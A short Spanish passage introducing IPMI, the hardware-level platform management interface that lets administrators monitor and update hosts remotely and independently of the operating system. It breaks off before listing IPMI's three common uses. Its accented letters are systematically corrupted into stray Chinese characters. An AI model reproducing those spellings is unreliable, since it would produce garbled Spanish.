IPMI

Intelligent Platform Management Interface (IPMI) es un conjunto de especificaciones estandarizadas para sistemas de gesti贸n de host basados en hardware que se utilizan para la gesti贸n y monitorizaci贸n de sistemas. Act煤a como un subsistema aut贸nomo y funciona independientemente de la BIOS, la CPU, el firmware y el sistema operativo subyacente del host. IPMI ofrece a los administradores de sistemas la posibilidad de gestionar y supervisar los sistemas aunque est茅n apagados o no respondan. Funciona mediante una conexi贸n de red directa al hardware del sistema y no requiere acceso al sistema operativo a trav茅s de un int茅rprete de comandos de inicio de sesi贸n. IPMI tambi茅n se puede utilizar para actualizaciones remotas de sistemas sin necesidad de acceso f铆sico al host de destino. IPMI se utiliza normalmente de tres maneras:
